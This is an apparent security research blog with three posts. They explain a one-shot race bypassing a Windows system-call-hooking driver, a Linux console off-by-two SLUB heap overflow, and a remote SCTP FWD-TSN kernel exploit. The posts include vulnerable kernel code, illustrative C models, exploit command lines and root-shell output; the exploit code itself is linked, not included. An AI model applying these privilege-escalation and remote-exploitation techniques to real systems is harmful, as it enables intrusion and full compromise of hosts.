kernelbof

Sunday, May 16, 2010

Security is Burning - Everything Old is New Again

Every time I convince myself not to make any more public posts, something almost magically occurs to make me change my mind.
The day before yesterday was a particularly boring day, when out of the blue a friend of mine dropped me an email bearing a link along with the following tongue-in-cheek remark:

"Looks familiar, doesn't it? :)))))"

What he linked me to was this URL.

It seems the latest trend in security research right now involves people forging new "names" for ~decade-old security issues. In this particular case, the attack referred to by the Matousec link was generously rechristened an "argument-switch attack". Are we that short on things to talk about? Or maybe we're all just assumed to be amnesiacs by our peers? Who knows.

To cite just a few references (there are many more out there) to the "Awful and Gruesome System Call Wrapper Flaw-By-Design" approach:

- 1) http://seclists.org/bugtraq/2003/Dec/351 - Andrey Kolishak

- 2) http://www.watson.org/~robert/2007woot/2007usenixwoot-exploitingconcurrency.pdf - Robert Watson

- 3) http://events.ccc.de/congress/2007/Fahrplan/events/2353.en.html - myself and twiz

What's funny is that when I re-read what I wrote in that presentation [3], I realized that I had *also* "forged" a ridiculous new name: "Handle Object Redirect Attacks" -- woot! Go me! It's so irresistible, forging useless new names!!

I don’t want to criticize the work of any other researchers, and I tend to think that the Matousec people did find these issues by themselves, spending (wasting?) a lot of time trying to warn security firms that the issue is present in almost all of their products... But despite this, I can state with a good degree of certainty that almost all of the major AV firms HAVE KNOWN about it for years.

Anyone dealing with this sort of thing also knows why they didn't change or fix anything. Is it worth it, when you weigh the effort of reworking the products' core engines against the real risk? I think not.

As a side-note... we never really thought that any of this was a critical issue, to begin with… after all, I'm pretty sure that by now most people in the security field are aware of the fact that running untrusted native code on a box practically translates to 'ring 0 access'...
but hey -- that's a whole other story entirely. :)

Moreover, there is reason to doubt how deep this research actually went. Quoting from their article:

"The argument-switch attack requires specific behavior from system scheduler which is impossible to ensure from user mode."

My first thought was: “Good! Maybe they simply wrote an in-depth analysis only for their customers?” (quoting their article again: “The full results of the research were offered to our clients and other software vendors”. Who knows?! :D )

Well, stating that the scheduler behavior cannot be controlled at all from userland is a little simplistic. As anybody who has dealt with kernel exploitation knows very well, there is no way the kernel can trust userland. If the vulnerable kernel control path runs in process context and directly references a userland virtual address, you can always force it to perform a deterministic context switch. This works the same way, and in one shot, on both multiprocessor and uniprocessor systems.

I've seen a lot of posts claiming that this vulnerability can only be exploited with a brute-force approach, and that even this is reliable within a few tries only on SMP boxes.

That’s NOT true.

With a brute-force approach the check WILL certainly get bypassed sooner or later, true... but what do you do if the AV engine simply blocks the first attempt, showing a process-blocking pop-up, blacklisting the process, and so on? In my humble opinion, taking this approach accomplishes little more than making the vulnerability completely useless (i.e., even more than it already was to begin with). The bypass MUST be one-shot, always.

I think it is now time to show the PoC I wrote during the presentation [3] but never released till now. It exploits the “Demand Paging” mechanism together with the “Direct I/O” and cache write-through to accomplish the one-shot bypass.

Modern OSs have supported these concepts for ages, and exploiting them to control the context switch is, in most cases, an easy task; Windows is no exception. The PoC demonstrates how to bypass, in one shot, the well-known vulnerable hookdemo.sys driver (written by Andrey Kolishak in [1]) on uniprocessor systems.

The driver simply wraps the ZwOpenKey() system call, trying to prevent access to the following key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.
The driver uses two different methods to deny access to the given registry key. The following PoC has been written to address the first (default) hook implementation, which dereferences the userland object twice.

The PoC code is straightforward. It manages two different string names.

A monitored key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”
A fake key: “\HKEY_LOCAL_MACHINE\Software\hookfake\test1”.

The userland process issues a system call using the fake key while a racer thread modifies it after the thread issuing the system call gets switched away from the current CPU. Everything works one-shot in a deterministic way. Let’s see how:

The userland process first creates (CreateFile()) a file with a random, previously non-existent name using the Direct I/O flag (FILE_FLAG_NO_BUFFERING on Windows). Next, respecting the granularity alignment constraints, the code writes the last, common part of the key (“test1”) into this file (WriteFile()) and closes the handle. Since the Cache Manager cannot rely on the system file cache during the next read of the file, the kernel is forced to access the file on disk, which forces a reschedule. Using the FILE_FLAG_WRITE_THROUGH flag alone is not enough: the data is written to disk immediately, but at the same time the system file cache gets filled with that data, which will be reused later.

The next step is the creation of a double memory mapping (CreateFileMapping() and MapViewOfFileEx()). The first mapping is anonymous. The second is placed right after the first and maps the first section of the aforementioned file. Since Windows uses Demand Paging, the system just creates an internal structure to keep track of the new mapping and returns. The file data backing the mapping is not pushed into the cache, and no page tables are even set up. Now that the two mappings are created, we can put the first part of the fake key (“\HKEY_LOCAL_MACHINE\Software\hookfake\”) at the very end of the first mapping. This way, the first part of the key string is already in memory, while the contiguous second part exists only on disk and is not yet loaded into memory.
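The placement trick can be sketched in portable C. This is only a model under stated assumptions, not the PoC: a single buffer of two "pages" stands in for the two adjacent mappings, MODEL_PAGE and place_split_string() are names made up for the illustration, and plain byte strings are used where the real code handles UTF-16 data for the UNICODE_STRING.

```c
#include <stddef.h>
#include <string.h>

#define MODEL_PAGE 4096u   /* assumed page size, for the model only */

/*
 * `region` stands for the two adjacent mappings (2 * MODEL_PAGE bytes):
 * bytes [0, MODEL_PAGE) play the anonymous mapping, the bytes after that
 * play the file-backed one. The prefix is placed so that its last byte is
 * the last byte of the first page; the tail starts the second page.
 * Returns the offset of the string start, or (size_t)-1 if it cannot fit.
 */
static size_t place_split_string(unsigned char *region,
                                 const void *prefix, size_t prefix_bytes,
                                 const void *tail, size_t tail_bytes)
{
    size_t start;

    if (prefix_bytes > MODEL_PAGE || tail_bytes > MODEL_PAGE)
        return (size_t)-1;

    start = MODEL_PAGE - prefix_bytes;
    memcpy(region + start, prefix, prefix_bytes);   /* resident part */
    memcpy(region + MODEL_PAGE, tail, tail_bytes);  /* in the PoC this part lives in the file */
    return start;
}
```

The returned offset is what would end up, as an address, in the Buffer field of the UNICODE_STRING: a reader walking the string from there crosses the page boundary exactly where the tail begins.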

We can now manually build the system call parameters, putting the address of the key string into the UNICODE_STRING object referenced by the OBJECT_ATTRIBUTES structure.
We need to do one last thing before invoking the system call: set up the racer thread. This thread spins on a process-global variable, waiting for its state to change. When the state changes, the racer thread replaces the “hookfake” string with the “hookdemo” string, restoring the original key: “\HKEY_LOCAL_MACHINE\Software\hookdemo\test1”.

But when will this be done? Let’s take a look at the hookdemo.sys driver:

During the NewZwOpenKey() system call wrapper routine, the code accesses the user-supplied key string at this line:

[ ... ]
rc = RtlAppendUnicodeStringToString(&KeyName, ObjectAttributes->ObjectName);
[ ... ]

ObjectName is the UNICODE_STRING structure holding the reference to our key string. When the driver tries to copy the final part of the key string (the one placed on the second mapping: “test1”) into the local KeyName object, the system generates a page fault since no page tables have been set up yet.

Moreover, the Windows Cache Manager realizes that 1) there is no cached copy available and 2) the file I/O and memory-mapped file access MUST NOT pass through the cache (since the file has been opened with FILE_FLAG_NO_BUFFERING), so it begins a disk data transfer and puts the process to sleep, thus rescheduling!! At this point, the wrapper routine has already copied the first part of the key; when the thread is scheduled back, the routine simply continues copying the remaining part (and everything happens totally transparently from the driver wrapper's perspective).

Just after the context switch occurs, the racer thread modifies the original (already copied) string and exits. Finally the original system call, invoked by the system call wrapper, operates on a different key string: the one we are interested in! Game Over!
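To make the sequence concrete, here is a single-threaded model of the double fetch in portable C. It is a sketch under loud assumptions and has nothing Windows-specific in it: hooked_open_key(), original_open_key() and racer() are hypothetical stand-ins for the wrapper, the real system call and the racer thread, and the "page fault and sleep" is modeled by a plain callback invoked in the middle of the copy.

```c
#include <stddef.h>
#include <string.h>

#define MONITORED_KEY "\\Software\\hookdemo\\test1"

/* Hypothetical hook: whatever gets to run while the wrapper sleeps on the fault. */
typedef void (*while_asleep_fn)(char *user_buf);

/* Stand-in for the original system call: it reads the caller's buffer again. */
static int original_open_key(const char *user_buf, size_t len)
{
    return len == strlen(MONITORED_KEY) &&
           memcmp(user_buf, MONITORED_KEY, len) == 0;    /* 1: protected key opened */
}

/*
 * Stand-in for the wrapper. It copies the name into a local buffer and checks
 * the copy; `split` marks where the copy hits the non-resident page.
 * Returns -2 on bad arguments, -1 when the call is denied, otherwise the
 * result of the original call.
 */
static int hooked_open_key(char *user_buf, size_t len, size_t split,
                           while_asleep_fn while_asleep)
{
    char local[128];

    if (len >= sizeof(local) || split > len)
        return -2;

    memcpy(local, user_buf, split);                       /* resident prefix */
    if (while_asleep)
        while_asleep(user_buf);                           /* fault, sleep, racer runs */
    memcpy(local + split, user_buf + split, len - split); /* copy resumes */
    local[len] = '\0';

    if (strcmp(local, MONITORED_KEY) == 0)
        return -1;                                        /* check made on the stale copy */

    return original_open_key(user_buf, len);              /* second fetch */
}

/* The racer: restores "hookdemo" in the caller's buffer. */
static void racer(char *user_buf)
{
    char *p = strstr(user_buf, "hookfake");

    if (p)
        memcpy(p, "hookdemo", 8);
}
```

Passing the monitored key directly is denied, while passing the fake key with the racer firing at the split point lets the original call see the monitored key. The model only shows the ordering of events; the determinism of the real thing comes from the forced disk read, not from a callback.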

Just a side note: to succeed, the two threads need to be serialized. The second thread must not run before the first thread is scheduled, and it has to act only AFTER the first thread invokes the system call. This is achieved by making the first thread set a global variable on which the racer thread spins. To be sure that the second thread will not modify the string before the first thread actually performs the system call, we must ensure that the two threads always run on the same processor! Ironically, this code natively performs correctly ONLY on uniprocessor boxes. On multi-core/multi-processor systems we have to ensure that all of the process's threads run on a given CPU using the processor affinity API (e.g. SetProcessAffinityMask()), as shown in the PoC.

This is just a sample output:

TSC Analysis: Before SystemCall = 174341962662283 After SystemCall = 174341962672609
[Diff] => 10326
Called normally: Key Handle: 0xffffffff

TSC Analysis: Before SystemCall = 174341968174781 After SystemCall = 174342017146092
[Diff] => 48971311
Check Bypassed: Game Over! KeyHandle: 0x7bc

As we can see, the first try calls the system call without the special mapping, directly passing the original key string. The wrapper intercepts the call and denies access to the registry key. The second try uses the special mapping described above and, as we can see, the system call returns a valid handle. Game Over.

The PoC code can be downloaded [here].
The hookdemo.sys code by Andrey Kolishak can be downloaded [here].

Thursday, July 2, 2009

Even when one byte matters

Common Vulnerabilities and Exposures

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046

"The console selection feature in the Linux kernel 2.6.28 before 2.6.28.4, 2.6.25, and possibly earlier versions, when the UTF-8 console is used, allows physically proximate attackers to cause a denial of service (memory corruption) by selecting a small number of 3-byte UTF-8 characters, which triggers an "an off-by-two memory error. NOTE: it is not clear whether this issue crosses privilege boundaries."

Ubuntu Security Notice USN-751-1

http://www.ubuntu.com/usn/usn-751-1

"The virtual consoles did not correctly handle certain UTF-8 sequences. A local attacker on the physical console could exploit this to cause a system crash, leading to a denial of service."

RedHat Security Advisory

http://rhn.redhat.com/errata/RHSA-2009-0451.html

"An off-by-two error was found in the set_selection() function of the Linux kernel. This could allow a local, unprivileged user to cause a denial of service when making a selection of characters in a UTF-8 console. Note: physical console access is required to exploit this issue."

While I was looking at vendor advisories regarding the SCTP remote issue, my attention was caught by another bug involving a hypothetical kernel heap overflow.
For the umpteenth time, the stated impact of the vulnerability is: DoS only.
The impact of this issue is highly limited because you need a virtual console (VC) attached to your process to exploit it, but it's worth spending some time on it since it's not an everyday bug to find in the kernel... it's an interesting scenario: an off-by-one (or two) kernel heap overflow.

As I did for the previous post, I'm not going to give a detailed description of the exploit: it should be straightforward enough for anyone who's used to playing with internal kernel structures.
What I'm about to do is, once again, briefly introduce the vulnerability and then spend some time showing how it is possible to turn it into a nearly one-shot exploit.

Before going on, I want to include a digression about this blog:
the original idea was to publish, month by month, an exploit for a vulnerability in the Linux kernel claimed to be DoS-only.
After publishing the first post, about the SCTP remote exploit, I got roasted a bit.
Someone took me to task for disclosing some cool stuff.
I want to point out that I just wrote the exploit: I did not kill the vulnerability.
I don't like full disclosure, or at least I don't like what full disclosure has become today: a freaking race between vuln-killer guys.
Even though I think there's a big difference between killing vulnerabilities and writing good exploit code, I'm not sure I'll continue publishing this stuff.

The buffer is allocated here:
file: /drivers/char/selection.c
func: set_selection()

multiplier = use_unicode ? 3 : 1;
bp = kmalloc((sel_end-sel_start)/2*multiplier+1, GFP_KERNEL);

then the function copies the buffer:

sel_buffer = bp;
obp = bp;
for (i = sel_start; i <= sel_end; i += 2) {
    c = sel_pos(i);
    if (use_unicode)
        bp += store_utf8(c, bp);
    ...

The loop goes from sel_start to sel_end (inclusive), so it copies one character more than the (sel_end-sel_start)/2 the allocation accounts for. That last character is not multiplied by multiplier (which has value 3), and so we can overflow the buffer by 1 or 2 bytes. To make the overflow meaningful we have to allocate a buffer whose size is close to the object size of a slab cache, or the overflow will end up in the padding. Since we control the "delta" between sel_start and sel_end, we can arbitrarily choose the SLUB cache to be used.

One of the better SLUB caches to pick is usually the 96-byte one... but it doesn't fulfill our goal because:

63 / 2 * 3 + 1 = 94

(if we overflow by 2 bytes we get 96... no meaningful overflow happens)

64 / 2 * 3 + 1 = 97

(too large to fit in)

We pick instead the 128-byte cache, using a gap equal to:

84 / 2 * 3 + 1 = 127

(if we overflow by 2 bytes we have a meaningful off-by-one heap overflow)
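The arithmetic above can be checked with a few lines of C. This is just a userspace calculator, not kernel code: the helper names are made up for the illustration, and the list of kmalloc size classes (8, 16, 32, 64, 96, 128, 192, 256, ...) is an assumption about a typical configuration.

```c
#include <stddef.h>

/* Bytes requested from kmalloc() for delta = sel_end - sel_start. */
static size_t sel_alloc_size(size_t delta, size_t multiplier)
{
    return delta / 2 * multiplier + 1;
}

/* Worst case written by the copy loop: one character for every i in
 * [sel_start, sel_end] stepping by 2, each up to `multiplier` bytes. */
static size_t sel_max_written(size_t delta, size_t multiplier)
{
    return (delta / 2 + 1) * multiplier;
}

/* Smallest assumed kmalloc size class that fits n bytes (0 if none listed). */
static size_t kmalloc_class(size_t n)
{
    static const size_t classes[] = { 8, 16, 32, 64, 96, 128, 192, 256,
                                      512, 1024, 2048, 4096 };
    size_t i;

    for (i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (n <= classes[i])
            return classes[i];
    return 0;
}

/* Bytes that spill past the end of the slab object (0 if everything fits). */
static size_t sel_spill(size_t delta, size_t multiplier)
{
    size_t object = kmalloc_class(sel_alloc_size(delta, multiplier));
    size_t written = sel_max_written(delta, multiplier);

    return written > object ? written - object : 0;
}
```

With a multiplier of 3, a delta of 63 requests 94 bytes and writes at most 96, which still fits the 96-byte object. A delta of 84 requests 127 bytes and can write 129, so one byte lands in the neighbouring 128-byte object.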

Now we can overflow into another 128-byte object that holds some interesting pointer, or we can smash an internal SLUB structure.

The exploit takes the latter approach: it smashes an internal SLUB structure and takes full control of the SLUB allocation engine.
I decided to use, once again, a previously disclosed structure as a placeholder: the SCTP ssnmap struct.

This can lead to some problems with SELinux.
There are other interesting structures to pick in place of the SCTP ones, but it is not worth showing them here for such a not-very-useful exploit.

A couple of words about the lack of full recovery in the exploit. On boxes protected by the kernel's zero-page mapping protection, the code leaves two descriptors holding smashed pointers in their internal structures. Before executing the shell, the code migrates those descriptors into a child process. When this child process is killed (at reboot?) the kernel oopses.

Alternatives could be:
- migrating the descriptors into some daemon using ptrace()/SCM_RIGHTS
- directly patching the smashed pointers by adding code to the ring0 shellcode
- using a stupid LKM

The exploit works only on the x86-64 platform with the SLUB allocator, but anyone can run it on an x86 kernel by modifying a couple of lines.

Talking about "external resources", the exploit uses "/proc/slabinfo" and "/proc/kallsyms". The former is not crucial but increases the exploitation odds close to 100% on idle boxes. The latter is not needed if you have access to the kernel image.

I'd like to thank twiz for his pioneering work on the original SLAB exploitation approach: it helped me a lot in abusing its new SLUB counterpart.

Tested on target:
Ubuntu 8.04 x86_64 (generic/server)
Ubuntu 8.10 x86_64 (generic/server)
Fedora Core 10 x86_64 (default installed kernel - without SELinux)

$ ./tioctl_houdini
[**] Patching ring0 shellcode with userspace addr: 0x4017e0
[**] Using port: 25433
[**] Getting slab info...
[**] Mapping Segments...
[**] Trying mapping safe page...Page Protection Present (Unable to Map Safe Page)
[**] Mapping High Address Page (don't kill placeholder child)
[**] Mapping Code Page... Done
[**] Binding on CPU 0
[**] Start Server Thread..

...
...
...
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
[**] Umapped end-to-end fd: 212
[**] Unsafe fd: ( 210 224 214 212 )
[**] Hijacking fops...
[**] Migrate evil unsafe fds to child process..
[**] Child process 25463 _MUST_ NOT die..keep it alive:)
[**] Got root!
# id
uid=0(root) gid=0(root) groups=1001(anon)

GAME OVER

The exploit code can be downloaded here.

Monday, April 27, 2009

When a "potential D.o.S." means a one-shot remote kernel exploit: the SCTP story

Common Vulnerabilities and Exposures
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0065

"Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. "

Ubuntu Security Notice USN-751-1
http://www.ubuntu.com/usn/usn-751-1

"The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)"

RedHat Security Advisory
http://rhn.redhat.com/errata/RHSA-2009-0331.html

"a buffer overflow was found in the Linux kernel Partial Reliable Stream
Control Transmission Protocol (PR-SCTP) implementation.
This could, potentially, lead to a denial of service if a Forward-TSN chunk is received
with a large stream ID. (CVE-2009-0065, Important) "

Potentially a DoS? Unknown Impact? Really? :D

I'm wondering why kernel developers (or vendors?) continue to claim that kernel memory corruptions are just Denial of Service. Most of the time they _are_ exploitable... yes, even when the vulnerability is remotely triggered; yes, even when the corruption takes place in a freaking slub in the middle of the kernel _heap_; yes, even when you have kernel data pages marked NX and the kernel .text read-only; and yes, absolutely yes, even when you start with only a 16-bit displacement...

Last month one of my customers (who has a _custom_ SCTP application deployed on his network) asked me whether the vulnerability might have some impact on his systems. The answer? "Yes it does", and since someone thinks it is not exploitable and someone else speculates about a possible local privilege escalation only (with a remote host sending TSN packets), I decided to write a completely remote exploit.

It is extremely reliable (nearly one-shot always), given that you know the target kernel. I tested it on Ubuntu 8.04 and Ubuntu 8.10 server boxes running different kernels (Ubuntu kernels for amd64), and on openSUSE 11.1 and Fedora Core 10 (yes, extra brownie points here, it works great on SELinux too). ...

I don't want to talk about the exploit, because the code should be self-explanatory, but I'd like to briefly explore the vulnerability:

From an exploit writer's point of view, the most critical points are: where the memory corruption occurs, when it occurs and what type of data structures are involved. The code that triggers the overflow is in sctp_ssn_skip() in the file /net/sctp/structs.h:

void sctp_ssn_skip(struct sctp_stream *stream, __u16 id, __u16 ssn)
{
    stream->ssn[id] = ssn+1;
}

The "id" parameter, a 16-bit value, is not checked before being used as an index into the array referenced by the stream->ssn pointer.
We can only overwrite memory _close_ to the struct involved.
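How close is "close"? A tiny userspace calculation gives the reach of the write. The helper names are made up for the illustration, and the bounds check is only the general shape of the test that is missing here, not a quote of any actual patch.

```c
#include <stddef.h>
#include <stdint.h>

/* Byte offset, from the base of stream->ssn, touched by stream->ssn[id]. */
static size_t ssn_write_offset(uint16_t id)
{
    return (size_t)id * sizeof(uint16_t);
}

/* The kind of check that is absent: id must be below the stream count. */
static int ssn_id_in_bounds(uint16_t id, unsigned int len)
{
    return id < len;
}
```

With id at its maximum of 0xffff the write lands 131070 bytes past the start of the array, so the reachable window is a bit under 128 KB after the ssn base, two bytes at a time.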

Let's take a look at the sctp_stream structure and its stream pointer. The sctp_ssnmap_new() and sctp_ssnmap_init() functions are in /net/sctp/ssnmap.c.

Structures involved in streams mapping are:

struct sctp_stream {
    __u16 *ssn;
    unsigned int len;
};

struct sctp_ssnmap {
    struct sctp_stream in;
    struct sctp_stream out;
    int malloced;
};

The code that allocates them is the following:

#define MAX_KMALLOC_SIZE 131072 //0x20000
...
size = sctp_ssnmap_size(in, out);
if (size <= MAX_KMALLOC_SIZE) retval = kmalloc(size, gfp);

If the size is within the MAX_KMALLOC_SIZE threshold, the function dynamically allocates the sctp_ssnmap struct, with a size derived from the number of in and out streams.
That's good news! By manipulating the SCTP handshake options we can arbitrarily decide which slab will be used to allocate the chunk (provided the SCTP application has no application-level checks on, e.g., the number of simultaneously opened SCTP streams).
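A userspace model shows how the stream counts drive the allocation size. It rests on an assumption: that sctp_ssnmap_size() is the header plus one 16-bit slot per in and out stream, which is what the layout set up by sctp_ssnmap_init() suggests. The *_model structs mirror the kernel ones with uint16_t in place of __u16, and uses_kmalloc() is a made-up name for the threshold test.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_KMALLOC_SIZE 131072   /* 0x20000 */

/* Userspace mirrors of the kernel structures. */
struct sctp_stream_model {
    uint16_t *ssn;
    unsigned int len;
};

struct sctp_ssnmap_model {
    struct sctp_stream_model in;
    struct sctp_stream_model out;
    int malloced;
};

/* Assumed size formula: header plus one 16-bit SSN per stream. */
static size_t ssnmap_size(uint16_t in, uint16_t out)
{
    return sizeof(struct sctp_ssnmap_model)
         + ((size_t)in + out) * sizeof(uint16_t);
}

/* Mirrors the threshold test that selects the kmalloc() path. */
static int uses_kmalloc(size_t size)
{
    return size <= MAX_KMALLOC_SIZE;
}
```

Every extra stream negotiated in the handshake adds two bytes to the request, so the peer can walk the allocation across size classes at will, as long as the application accepts the stream counts.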

Immediately after that, the function calls sctp_ssnmap_init() to initialize in/out stream pointers:

static struct sctp_ssnmap *sctp_ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
    memset(map, 0x00, sctp_ssnmap_size(in, out));

    /* Start 'in' stream just after the map header. */
    map->in.ssn = (__u16 *)&map[1];     /* <--- stream in init */
    map->in.len = in;

    /* Start 'out' stream just after 'in'. */
    map->out.ssn = &map->in.ssn[in];    /* <--- stream out init */
    map->out.len = out;

    return map;
}

Again, good news. The stream pointers are self-contained. They point inside the previously allocated buffer, and more precisely the input stream is located exactly after the header. No kfree() will ever be called on these pointers: in other words they are a safe place to overwrite, and there's no need to worry about post-exploitation recovery.

The last thing that may complicate the exploit a bit is a check that the kernel makes before invoking sctp_ssn_skip():

/net/sctp/ulpqueue.c: sctp_ulpq_skip():

    if (SSN_lt(ssn, sctp_ssn_peek(in, sid)))    /* <--- check */
        return;

    /* Mark that we are no longer expecting this SSN or lower. */
    sctp_ssn_skip(in, sid, ssn);

with SSN_lt():

enum {
    SSN_SIGN_BIT = (1<<15)
};
[ ... ]

Strictly speaking, this code checks whether the value we are overwriting (the old SSN content) is greater than the new value: if so, it doesn't process the FWD chunk. The comparison is made using Serial Number Arithmetic (like the one used for protocol sequence numbers, e.g. TCP sequence numbers) and can be fooled by writing multiple chunks until the value legally wraps around to a well-defined, known value.
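The wrap-around can be tried out in userspace. The sketch below assumes that SSN_lt(s, t) boils down to testing the sign bit of the 16-bit difference s - t, which is what SSN_SIGN_BIT hints at; ssn_lt() and model_ulpq_skip() are illustrative stand-ins operating on a single 16-bit slot, not the kernel functions.

```c
#include <stdint.h>

enum { SSN_SIGN_BIT = (1 << 15) };

/* Assumed serial-number comparison: s is "less than" t when the 16-bit
 * difference s - t has its sign bit set. */
static int ssn_lt(uint16_t s, uint16_t t)
{
    return ((uint16_t)(s - t) & SSN_SIGN_BIT) != 0;
}

/* Model of the check followed by the write: returns 1 if the slot was
 * updated, 0 if the chunk would have been ignored. */
static int model_ulpq_skip(uint16_t *slot, uint16_t ssn)
{
    if (ssn_lt(ssn, *slot))
        return 0;                   /* new SSN is behind the stored one */
    *slot = (uint16_t)(ssn + 1);    /* same write as sctp_ssn_skip() */
    return 1;
}
```

For example, with 0x2000 in the slot a direct attempt to store 0x1000 (ssn 0x0fff) is ignored, because 0x0fff is "behind" 0x2000. Sending ssn 0x9000 first is accepted and leaves 0x9001 in the slot; after that, ssn 0x0fff is no longer "behind" and the slot ends up holding 0x1000.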

Then, at this point, if we know the target running kernel, we can:

1) Control the slab/slub to be used
2) Overwrite a safe pointer close to the overflowing buffer
3) Easily control overwritten data..

.. in other words..
..
#./sctp_houdini -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0

GAME OVER

The exploit code can be downloaded here.